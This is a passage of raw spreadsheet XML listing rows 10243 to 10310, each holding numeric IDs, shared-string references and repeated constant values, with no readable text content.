      <c r="C10243" s="2" t="s">
        <v>9802</v>
      </c>
      <c r="D10243" s="2">
        <v>1.0</v>
      </c>
      <c r="E10243" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10243" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10244" ht="15.75" customHeight="1">
      <c r="A10244" s="1">
        <v>13630.0</v>
      </c>
      <c r="B10244" s="2">
        <v>3.5886011E7</v>
      </c>
      <c r="C10244" s="2" t="s">
        <v>9803</v>
      </c>
      <c r="D10244" s="2">
        <v>1.0</v>
      </c>
      <c r="E10244" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10244" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10245" ht="15.75" customHeight="1">
      <c r="A10245" s="1">
        <v>13642.0</v>
      </c>
      <c r="B10245" s="2">
        <v>3.5912905E7</v>
      </c>
      <c r="C10245" s="2" t="s">
        <v>9804</v>
      </c>
      <c r="D10245" s="2">
        <v>1.0</v>
      </c>
      <c r="E10245" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10245" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10246" ht="15.75" customHeight="1">
      <c r="A10246" s="1">
        <v>13665.0</v>
      </c>
      <c r="B10246" s="2">
        <v>3.6011765E7</v>
      </c>
      <c r="C10246" s="2" t="s">
        <v>9805</v>
      </c>
      <c r="D10246" s="2">
        <v>1.0</v>
      </c>
      <c r="E10246" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10246" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10247" ht="15.75" customHeight="1">
      <c r="A10247" s="1">
        <v>13731.0</v>
      </c>
      <c r="B10247" s="2">
        <v>3.6402705E7</v>
      </c>
      <c r="C10247" s="2" t="s">
        <v>9806</v>
      </c>
      <c r="D10247" s="2">
        <v>1.0</v>
      </c>
      <c r="E10247" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10247" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10248" ht="15.75" customHeight="1">
      <c r="A10248" s="1">
        <v>13821.0</v>
      </c>
      <c r="B10248" s="2">
        <v>3.6746079E7</v>
      </c>
      <c r="C10248" s="2" t="s">
        <v>9807</v>
      </c>
      <c r="D10248" s="2">
        <v>1.0</v>
      </c>
      <c r="E10248" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10248" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10249" ht="15.75" customHeight="1">
      <c r="A10249" s="1">
        <v>13826.0</v>
      </c>
      <c r="B10249" s="2">
        <v>3.6768724E7</v>
      </c>
      <c r="C10249" s="2" t="s">
        <v>9808</v>
      </c>
      <c r="D10249" s="2">
        <v>1.0</v>
      </c>
      <c r="E10249" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10249" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10250" ht="15.75" customHeight="1">
      <c r="A10250" s="1">
        <v>13830.0</v>
      </c>
      <c r="B10250" s="2">
        <v>3.6772056E7</v>
      </c>
      <c r="C10250" s="2" t="s">
        <v>9809</v>
      </c>
      <c r="D10250" s="2">
        <v>1.0</v>
      </c>
      <c r="E10250" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10250" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10251" ht="15.75" customHeight="1">
      <c r="A10251" s="1">
        <v>13882.0</v>
      </c>
      <c r="B10251" s="2">
        <v>3.6998016E7</v>
      </c>
      <c r="C10251" s="2" t="s">
        <v>9810</v>
      </c>
      <c r="D10251" s="2">
        <v>1.0</v>
      </c>
      <c r="E10251" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10251" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10252" ht="15.75" customHeight="1">
      <c r="A10252" s="1">
        <v>13940.0</v>
      </c>
      <c r="B10252" s="2">
        <v>3.7170977E7</v>
      </c>
      <c r="C10252" s="2" t="s">
        <v>9811</v>
      </c>
      <c r="D10252" s="2">
        <v>1.0</v>
      </c>
      <c r="E10252" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10252" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10253" ht="15.75" customHeight="1">
      <c r="A10253" s="1">
        <v>13982.0</v>
      </c>
      <c r="B10253" s="2">
        <v>3.7353107E7</v>
      </c>
      <c r="C10253" s="2" t="s">
        <v>9812</v>
      </c>
      <c r="D10253" s="2">
        <v>1.0</v>
      </c>
      <c r="E10253" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10253" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10254" ht="15.75" customHeight="1">
      <c r="A10254" s="1">
        <v>14272.0</v>
      </c>
      <c r="B10254" s="2">
        <v>3.8441704E7</v>
      </c>
      <c r="C10254" s="2" t="s">
        <v>9813</v>
      </c>
      <c r="D10254" s="2">
        <v>1.0</v>
      </c>
      <c r="E10254" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10254" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10255" ht="15.75" customHeight="1">
      <c r="A10255" s="1">
        <v>14278.0</v>
      </c>
      <c r="B10255" s="2">
        <v>3.8455523E7</v>
      </c>
      <c r="C10255" s="2" t="s">
        <v>9814</v>
      </c>
      <c r="D10255" s="2">
        <v>1.0</v>
      </c>
      <c r="E10255" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10255" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10256" ht="15.75" customHeight="1">
      <c r="A10256" s="1">
        <v>14625.0</v>
      </c>
      <c r="B10256" s="2">
        <v>4.0302617E7</v>
      </c>
      <c r="C10256" s="2" t="s">
        <v>9815</v>
      </c>
      <c r="D10256" s="2">
        <v>1.0</v>
      </c>
      <c r="E10256" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10256" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10257" ht="15.75" customHeight="1">
      <c r="A10257" s="1">
        <v>14648.0</v>
      </c>
      <c r="B10257" s="2">
        <v>4.0367621E7</v>
      </c>
      <c r="C10257" s="2" t="s">
        <v>9816</v>
      </c>
      <c r="D10257" s="2">
        <v>1.0</v>
      </c>
      <c r="E10257" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10257" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10258" ht="15.75" customHeight="1">
      <c r="A10258" s="1">
        <v>14745.0</v>
      </c>
      <c r="B10258" s="2">
        <v>4.0721586E7</v>
      </c>
      <c r="C10258" s="2" t="s">
        <v>9817</v>
      </c>
      <c r="D10258" s="2">
        <v>1.0</v>
      </c>
      <c r="E10258" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10258" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10259" ht="15.75" customHeight="1">
      <c r="A10259" s="1">
        <v>14862.0</v>
      </c>
      <c r="B10259" s="2">
        <v>4.1067558E7</v>
      </c>
      <c r="C10259" s="2" t="s">
        <v>9818</v>
      </c>
      <c r="D10259" s="2">
        <v>1.0</v>
      </c>
      <c r="E10259" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10259" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10260" ht="15.75" customHeight="1">
      <c r="A10260" s="1">
        <v>14892.0</v>
      </c>
      <c r="B10260" s="2">
        <v>4.1129678E7</v>
      </c>
      <c r="C10260" s="2" t="s">
        <v>9819</v>
      </c>
      <c r="D10260" s="2">
        <v>1.0</v>
      </c>
      <c r="E10260" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10260" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10261" ht="15.75" customHeight="1">
      <c r="A10261" s="1">
        <v>14968.0</v>
      </c>
      <c r="B10261" s="2">
        <v>4.1345642E7</v>
      </c>
      <c r="C10261" s="2" t="s">
        <v>9820</v>
      </c>
      <c r="D10261" s="2">
        <v>1.0</v>
      </c>
      <c r="E10261" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10261" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10262" ht="15.75" customHeight="1">
      <c r="A10262" s="1">
        <v>15132.0</v>
      </c>
      <c r="B10262" s="2">
        <v>4.1903433E7</v>
      </c>
      <c r="C10262" s="2" t="s">
        <v>9821</v>
      </c>
      <c r="D10262" s="2">
        <v>1.0</v>
      </c>
      <c r="E10262" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10262" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10263" ht="15.75" customHeight="1">
      <c r="A10263" s="1">
        <v>15316.0</v>
      </c>
      <c r="B10263" s="2">
        <v>4.2513962E7</v>
      </c>
      <c r="C10263" s="2" t="s">
        <v>9822</v>
      </c>
      <c r="D10263" s="2">
        <v>1.0</v>
      </c>
      <c r="E10263" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10263" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10264" ht="15.75" customHeight="1">
      <c r="A10264" s="1">
        <v>15476.0</v>
      </c>
      <c r="B10264" s="2">
        <v>4.3148395E7</v>
      </c>
      <c r="C10264" s="2" t="s">
        <v>9823</v>
      </c>
      <c r="D10264" s="2">
        <v>1.0</v>
      </c>
      <c r="E10264" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10264" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10265" ht="15.75" customHeight="1">
      <c r="A10265" s="1">
        <v>15515.0</v>
      </c>
      <c r="B10265" s="2">
        <v>4.3274803E7</v>
      </c>
      <c r="C10265" s="2" t="s">
        <v>9824</v>
      </c>
      <c r="D10265" s="2">
        <v>1.0</v>
      </c>
      <c r="E10265" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10265" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10266" ht="15.75" customHeight="1">
      <c r="A10266" s="1">
        <v>15605.0</v>
      </c>
      <c r="B10266" s="2">
        <v>4.3507303E7</v>
      </c>
      <c r="C10266" s="2" t="s">
        <v>9825</v>
      </c>
      <c r="D10266" s="2">
        <v>1.0</v>
      </c>
      <c r="E10266" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10266" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10267" ht="15.75" customHeight="1">
      <c r="A10267" s="1">
        <v>15662.0</v>
      </c>
      <c r="B10267" s="2">
        <v>4.3704846E7</v>
      </c>
      <c r="C10267" s="2" t="s">
        <v>9826</v>
      </c>
      <c r="D10267" s="2">
        <v>1.0</v>
      </c>
      <c r="E10267" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10267" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10268" ht="15.75" customHeight="1">
      <c r="A10268" s="1">
        <v>15849.0</v>
      </c>
      <c r="B10268" s="2">
        <v>4.4437146E7</v>
      </c>
      <c r="C10268" s="2" t="s">
        <v>9827</v>
      </c>
      <c r="D10268" s="2">
        <v>1.0</v>
      </c>
      <c r="E10268" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10268" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10269" ht="15.75" customHeight="1">
      <c r="A10269" s="1">
        <v>15882.0</v>
      </c>
      <c r="B10269" s="2">
        <v>4.4529625E7</v>
      </c>
      <c r="C10269" s="2" t="s">
        <v>9828</v>
      </c>
      <c r="D10269" s="2">
        <v>1.0</v>
      </c>
      <c r="E10269" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10269" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10270" ht="15.75" customHeight="1">
      <c r="A10270" s="1">
        <v>16131.0</v>
      </c>
      <c r="B10270" s="2">
        <v>4.5514747E7</v>
      </c>
      <c r="C10270" s="2" t="s">
        <v>9829</v>
      </c>
      <c r="D10270" s="2">
        <v>1.0</v>
      </c>
      <c r="E10270" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10270" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10271" ht="15.75" customHeight="1">
      <c r="A10271" s="1">
        <v>16302.0</v>
      </c>
      <c r="B10271" s="2">
        <v>4.590715E7</v>
      </c>
      <c r="C10271" s="2" t="s">
        <v>9830</v>
      </c>
      <c r="D10271" s="2">
        <v>1.0</v>
      </c>
      <c r="E10271" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10271" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10272" ht="15.75" customHeight="1">
      <c r="A10272" s="1">
        <v>16340.0</v>
      </c>
      <c r="B10272" s="2">
        <v>4.6057793E7</v>
      </c>
      <c r="C10272" s="2" t="s">
        <v>9831</v>
      </c>
      <c r="D10272" s="2">
        <v>1.0</v>
      </c>
      <c r="E10272" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10272" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10273" ht="15.75" customHeight="1">
      <c r="A10273" s="1">
        <v>16447.0</v>
      </c>
      <c r="B10273" s="2">
        <v>4.6409958E7</v>
      </c>
      <c r="C10273" s="5" t="s">
        <v>9832</v>
      </c>
      <c r="D10273" s="2">
        <v>1.0</v>
      </c>
      <c r="E10273" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10273" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10274" ht="15.75" customHeight="1">
      <c r="A10274" s="1">
        <v>16674.0</v>
      </c>
      <c r="B10274" s="2">
        <v>4.7276454E7</v>
      </c>
      <c r="C10274" s="2" t="s">
        <v>9833</v>
      </c>
      <c r="D10274" s="2">
        <v>1.0</v>
      </c>
      <c r="E10274" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10274" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10275" ht="15.75" customHeight="1">
      <c r="A10275" s="1">
        <v>16689.0</v>
      </c>
      <c r="B10275" s="2">
        <v>4.7329874E7</v>
      </c>
      <c r="C10275" s="2" t="s">
        <v>9834</v>
      </c>
      <c r="D10275" s="2">
        <v>1.0</v>
      </c>
      <c r="E10275" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10275" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10276" ht="15.75" customHeight="1">
      <c r="A10276" s="1">
        <v>16692.0</v>
      </c>
      <c r="B10276" s="2">
        <v>4.7330704E7</v>
      </c>
      <c r="C10276" s="2" t="s">
        <v>9835</v>
      </c>
      <c r="D10276" s="2">
        <v>1.0</v>
      </c>
      <c r="E10276" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10276" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10277" ht="15.75" customHeight="1">
      <c r="A10277" s="1">
        <v>17200.0</v>
      </c>
      <c r="B10277" s="2">
        <v>4.9013706E7</v>
      </c>
      <c r="C10277" s="2" t="s">
        <v>9836</v>
      </c>
      <c r="D10277" s="2">
        <v>1.0</v>
      </c>
      <c r="E10277" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10277" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10278" ht="15.75" customHeight="1">
      <c r="A10278" s="1">
        <v>17253.0</v>
      </c>
      <c r="B10278" s="2">
        <v>4.9119288E7</v>
      </c>
      <c r="C10278" s="2" t="s">
        <v>9837</v>
      </c>
      <c r="D10278" s="2">
        <v>1.0</v>
      </c>
      <c r="E10278" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10278" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10279" ht="15.75" customHeight="1">
      <c r="A10279" s="1">
        <v>17281.0</v>
      </c>
      <c r="B10279" s="2">
        <v>4.9210535E7</v>
      </c>
      <c r="C10279" s="2" t="s">
        <v>9838</v>
      </c>
      <c r="D10279" s="2">
        <v>1.0</v>
      </c>
      <c r="E10279" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10279" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10280" ht="15.75" customHeight="1">
      <c r="A10280" s="1">
        <v>17621.0</v>
      </c>
      <c r="B10280" s="2">
        <v>5.0375827E7</v>
      </c>
      <c r="C10280" s="2" t="s">
        <v>9839</v>
      </c>
      <c r="D10280" s="2">
        <v>1.0</v>
      </c>
      <c r="E10280" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10280" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10281" ht="15.75" customHeight="1">
      <c r="A10281" s="1">
        <v>17784.0</v>
      </c>
      <c r="B10281" s="2">
        <v>5.0785023E7</v>
      </c>
      <c r="C10281" s="2" t="s">
        <v>9840</v>
      </c>
      <c r="D10281" s="2">
        <v>1.0</v>
      </c>
      <c r="E10281" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10281" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10282" ht="15.75" customHeight="1">
      <c r="A10282" s="1">
        <v>17792.0</v>
      </c>
      <c r="B10282" s="2">
        <v>5.0801358E7</v>
      </c>
      <c r="C10282" s="2" t="s">
        <v>9841</v>
      </c>
      <c r="D10282" s="2">
        <v>1.0</v>
      </c>
      <c r="E10282" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10282" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10283" ht="15.75" customHeight="1">
      <c r="A10283" s="1">
        <v>17813.0</v>
      </c>
      <c r="B10283" s="2">
        <v>5.0899813E7</v>
      </c>
      <c r="C10283" s="2" t="s">
        <v>9842</v>
      </c>
      <c r="D10283" s="2">
        <v>1.0</v>
      </c>
      <c r="E10283" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10283" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10284" ht="15.75" customHeight="1">
      <c r="A10284" s="1">
        <v>17936.0</v>
      </c>
      <c r="B10284" s="2">
        <v>5.1244785E7</v>
      </c>
      <c r="C10284" s="2" t="s">
        <v>9843</v>
      </c>
      <c r="D10284" s="2">
        <v>1.0</v>
      </c>
      <c r="E10284" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10284" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10285" ht="15.75" customHeight="1">
      <c r="A10285" s="1">
        <v>17937.0</v>
      </c>
      <c r="B10285" s="2">
        <v>5.1246339E7</v>
      </c>
      <c r="C10285" s="2" t="s">
        <v>9844</v>
      </c>
      <c r="D10285" s="2">
        <v>1.0</v>
      </c>
      <c r="E10285" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10285" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10286" ht="15.75" customHeight="1">
      <c r="A10286" s="1">
        <v>17975.0</v>
      </c>
      <c r="B10286" s="2">
        <v>5.1361803E7</v>
      </c>
      <c r="C10286" s="2" t="s">
        <v>9845</v>
      </c>
      <c r="D10286" s="2">
        <v>1.0</v>
      </c>
      <c r="E10286" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10286" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10287" ht="15.75" customHeight="1">
      <c r="A10287" s="1">
        <v>18120.0</v>
      </c>
      <c r="B10287" s="2">
        <v>5.1767348E7</v>
      </c>
      <c r="C10287" s="2" t="s">
        <v>9846</v>
      </c>
      <c r="D10287" s="2">
        <v>1.0</v>
      </c>
      <c r="E10287" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10287" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10288" ht="15.75" customHeight="1">
      <c r="A10288" s="1">
        <v>18132.0</v>
      </c>
      <c r="B10288" s="2">
        <v>5.1814187E7</v>
      </c>
      <c r="C10288" s="2" t="s">
        <v>9847</v>
      </c>
      <c r="D10288" s="2">
        <v>1.0</v>
      </c>
      <c r="E10288" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10288" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10289" ht="15.75" customHeight="1">
      <c r="A10289" s="1">
        <v>18270.0</v>
      </c>
      <c r="B10289" s="2">
        <v>5.2205188E7</v>
      </c>
      <c r="C10289" s="2" t="s">
        <v>9848</v>
      </c>
      <c r="D10289" s="2">
        <v>1.0</v>
      </c>
      <c r="E10289" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10289" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10290" ht="15.75" customHeight="1">
      <c r="A10290" s="1">
        <v>18305.0</v>
      </c>
      <c r="B10290" s="2">
        <v>5.2371982E7</v>
      </c>
      <c r="C10290" s="2" t="s">
        <v>9849</v>
      </c>
      <c r="D10290" s="2">
        <v>1.0</v>
      </c>
      <c r="E10290" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10290" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10291" ht="15.75" customHeight="1">
      <c r="A10291" s="1">
        <v>18357.0</v>
      </c>
      <c r="B10291" s="2">
        <v>5.2516114E7</v>
      </c>
      <c r="C10291" s="2" t="s">
        <v>9850</v>
      </c>
      <c r="D10291" s="2">
        <v>1.0</v>
      </c>
      <c r="E10291" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10291" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10292" ht="15.75" customHeight="1">
      <c r="A10292" s="1">
        <v>18400.0</v>
      </c>
      <c r="B10292" s="2">
        <v>5.2635262E7</v>
      </c>
      <c r="C10292" s="2" t="s">
        <v>9851</v>
      </c>
      <c r="D10292" s="2">
        <v>1.0</v>
      </c>
      <c r="E10292" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10292" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10293" ht="15.75" customHeight="1">
      <c r="A10293" s="1">
        <v>18764.0</v>
      </c>
      <c r="B10293" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C10293" s="2" t="s">
        <v>9852</v>
      </c>
      <c r="D10293" s="2">
        <v>1.0</v>
      </c>
      <c r="E10293" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10293" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10294" ht="15.75" customHeight="1">
      <c r="A10294" s="1">
        <v>18800.0</v>
      </c>
      <c r="B10294" s="2">
        <v>5.3859936E7</v>
      </c>
      <c r="C10294" s="2" t="s">
        <v>9853</v>
      </c>
      <c r="D10294" s="2">
        <v>1.0</v>
      </c>
      <c r="E10294" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10294" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10295" ht="15.75" customHeight="1">
      <c r="A10295" s="1">
        <v>18875.0</v>
      </c>
      <c r="B10295" s="2">
        <v>5.4067128E7</v>
      </c>
      <c r="C10295" s="2" t="s">
        <v>9854</v>
      </c>
      <c r="D10295" s="2">
        <v>1.0</v>
      </c>
      <c r="E10295" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10295" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10296" ht="15.75" customHeight="1">
      <c r="A10296" s="1">
        <v>18884.0</v>
      </c>
      <c r="B10296" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C10296" s="2" t="s">
        <v>9855</v>
      </c>
      <c r="D10296" s="2">
        <v>1.0</v>
      </c>
      <c r="E10296" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10296" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10297" ht="15.75" customHeight="1">
      <c r="A10297" s="1">
        <v>19000.0</v>
      </c>
      <c r="B10297" s="2">
        <v>5.445489E7</v>
      </c>
      <c r="C10297" s="2" t="s">
        <v>9856</v>
      </c>
      <c r="D10297" s="2">
        <v>1.0</v>
      </c>
      <c r="E10297" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10297" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10298" ht="15.75" customHeight="1">
      <c r="A10298" s="1">
        <v>19125.0</v>
      </c>
      <c r="B10298" s="2">
        <v>5.4762661E7</v>
      </c>
      <c r="C10298" s="2" t="s">
        <v>9857</v>
      </c>
      <c r="D10298" s="2">
        <v>1.0</v>
      </c>
      <c r="E10298" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10298" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10299" ht="15.75" customHeight="1">
      <c r="A10299" s="1">
        <v>19181.0</v>
      </c>
      <c r="B10299" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C10299" s="2" t="s">
        <v>9858</v>
      </c>
      <c r="D10299" s="2">
        <v>1.0</v>
      </c>
      <c r="E10299" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10299" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10300" ht="15.75" customHeight="1">
      <c r="A10300" s="1">
        <v>19288.0</v>
      </c>
      <c r="B10300" s="2">
        <v>5.5178863E7</v>
      </c>
      <c r="C10300" s="2" t="s">
        <v>9859</v>
      </c>
      <c r="D10300" s="2">
        <v>1.0</v>
      </c>
      <c r="E10300" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10300" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10301" ht="15.75" customHeight="1">
      <c r="A10301" s="1">
        <v>19476.0</v>
      </c>
      <c r="B10301" s="2">
        <v>5.5836783E7</v>
      </c>
      <c r="C10301" s="2" t="s">
        <v>9860</v>
      </c>
      <c r="D10301" s="2">
        <v>1.0</v>
      </c>
      <c r="E10301" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10301" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10302" ht="15.75" customHeight="1">
      <c r="A10302" s="1">
        <v>19731.0</v>
      </c>
      <c r="B10302" s="2">
        <v>5.6627006E7</v>
      </c>
      <c r="C10302" s="2" t="s">
        <v>9861</v>
      </c>
      <c r="D10302" s="2">
        <v>1.0</v>
      </c>
      <c r="E10302" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10302" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10303" ht="15.75" customHeight="1">
      <c r="A10303" s="1">
        <v>19738.0</v>
      </c>
      <c r="B10303" s="2">
        <v>5.6677784E7</v>
      </c>
      <c r="C10303" s="2" t="s">
        <v>9862</v>
      </c>
      <c r="D10303" s="2">
        <v>1.0</v>
      </c>
      <c r="E10303" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10303" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10304" ht="15.75" customHeight="1">
      <c r="A10304" s="1">
        <v>19839.0</v>
      </c>
      <c r="B10304" s="2">
        <v>5.7061947E7</v>
      </c>
      <c r="C10304" s="2" t="s">
        <v>9863</v>
      </c>
      <c r="D10304" s="2">
        <v>1.0</v>
      </c>
      <c r="E10304" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10304" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10305" ht="15.75" customHeight="1">
      <c r="A10305" s="1">
        <v>20583.0</v>
      </c>
      <c r="B10305" s="2">
        <v>1.3707848E7</v>
      </c>
      <c r="C10305" s="2" t="s">
        <v>9864</v>
      </c>
      <c r="D10305" s="2">
        <v>1.0</v>
      </c>
      <c r="E10305" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10305" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10306" ht="15.75" customHeight="1">
      <c r="A10306" s="1">
        <v>21224.0</v>
      </c>
      <c r="B10306" s="2">
        <v>1.9609659E7</v>
      </c>
      <c r="C10306" s="2" t="s">
        <v>9865</v>
      </c>
      <c r="D10306" s="2">
        <v>1.0</v>
      </c>
      <c r="E10306" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10306" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10307" ht="15.75" customHeight="1">
      <c r="A10307" s="1">
        <v>21416.0</v>
      </c>
      <c r="B10307" s="2">
        <v>2.1987102E7</v>
      </c>
      <c r="C10307" s="2" t="s">
        <v>9866</v>
      </c>
      <c r="D10307" s="2">
        <v>1.0</v>
      </c>
      <c r="E10307" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10307" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10308" ht="15.75" customHeight="1">
      <c r="A10308" s="1">
        <v>23445.0</v>
      </c>
      <c r="B10308" s="2">
        <v>5671042.0</v>
      </c>
      <c r="C10308" s="2" t="s">
        <v>9867</v>
      </c>
      <c r="D10308" s="2">
        <v>1.0</v>
      </c>
      <c r="E10308" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10308" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10309" ht="15.75" customHeight="1">
      <c r="A10309" s="1">
        <v>23735.0</v>
      </c>
      <c r="B10309" s="2">
        <v>7314923.0</v>
      </c>
      <c r="C10309" s="2" t="s">
        <v>9868</v>
      </c>
      <c r="D10309" s="2">
        <v>1.0</v>
      </c>
      <c r="E10309" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10309" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10310" ht="15.75" customHeight="1">
      <c r="A10310" s="1">
        <v>24118.0</v>
      </c>
      <c r="B10310" s="2">
        <v>1.0003754E7</v>
